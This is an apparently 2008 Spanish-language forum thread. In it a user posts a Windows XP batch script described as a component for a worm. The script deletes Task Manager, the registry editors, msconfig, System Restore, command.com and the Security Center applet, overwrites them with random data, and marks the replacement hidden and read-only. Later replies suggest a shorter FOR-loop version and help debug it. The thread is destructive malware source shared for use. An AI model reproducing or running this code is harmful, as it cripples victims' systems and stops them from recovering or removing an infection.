Código de restricción de seguridad en batch

Iniciado por corax, 14 Julio 2008, 17:47 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

corax

14 Julio 2008, 17:47 PM
Buenas a todos!

ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.

Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:

Código (bash) [Seleccionar]
@echo off

del /Q /F %WINDIR%\System32\taskmgr.exe
del /Q /F %WINDIR%\System32\tasklist.exe
del /Q /F %WINDIR%\System32\regedt32.exe
del /Q /F %WINDIR%\System32\wscui.cpl
del /Q /F %WINDIR%\System32\command.com
del /Q /F %WINDIR%\System32\restore\rstrui.exe
del /Q /F %WINDIR%\System32\restore\srdiag.exe
del /Q /F %WINDIR%\taskman.exe
del /Q /F %WINDIR%\regedit.exe
del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe

echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
attrib +s +h +r "%WINDIR%\System32\cmd.com"

Hasta otra!
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.

Darioxhcx

#1
14 Julio 2008, 18:24 PM
esta muy bien
pero se podria hacer mas corto con el FOR
me gusta la idea
saludos

Crazy.sx

#2
14 Julio 2008, 21:06 PM
Si, aunque solo poniendo un solo echo es suficiente ya que de cualquier manera no funcionará tales ejecutables. O también como usando for como lo dice Darioxhcx.

Saludos
Destruir K. LOL

SmartGenius

#3
19 Julio 2008, 04:18 AM
vendria siendo asi ??

for %%a in (taskmgr.exe,tasklist.exe,regedt32.exe,wscui.cpl) do (echo You was Fucked %random%>%windir%\system32\%%a)

Saludos.

Darioxhcx

#4
19 Julio 2008, 06:37 AM
Cita de: :: SmartGenius :: en 19 Julio 2008, 04:18 AM
vendria siendo asi ??

for %%a in (taskmgr.exe,tasklist.exe,regedt32.exe,wscui.cpl) do (echo You was Fucked %random%>%windir%\system32\%%a)

Saludos.
lo probe asi
for /r %%a in ( taskmgr.txt,tasklist.txt,regedt32.txt,wscui.txt ) do ( echo You was Fucked %random%%%a>C:\1 )

C:\1 es una carpeta que uso para prubas asi
pero me sale
"acceso denegado"
no se por que u.u

saludos

SmartGenius

#5
19 Julio 2008, 18:58 PM
Cita de: Darioxhcx en 19 Julio 2008, 06:37 AM
lo probe asi
for /r %%a in ( taskmgr.txt,tasklist.txt,regedt32.txt,wscui.txt ) do ( echo You was Fucked %random%%%a>C:\1 )

C:\1 es una carpeta que uso para prubas asi
pero me sale
"acceso denegado"
no se por que u.u

saludos

creo que lo estas haciendo mal, deberia ser >C:\1\%%a , ya que lo que estas haciendo es tratar de redirigir la salida a una carpeta y no creo que sea posible, y ademas que tantos %% pegados pueden poner problema tambien...

Saludos.

Imprimir
Ir Arriba Páginas1
Acciones del Usuario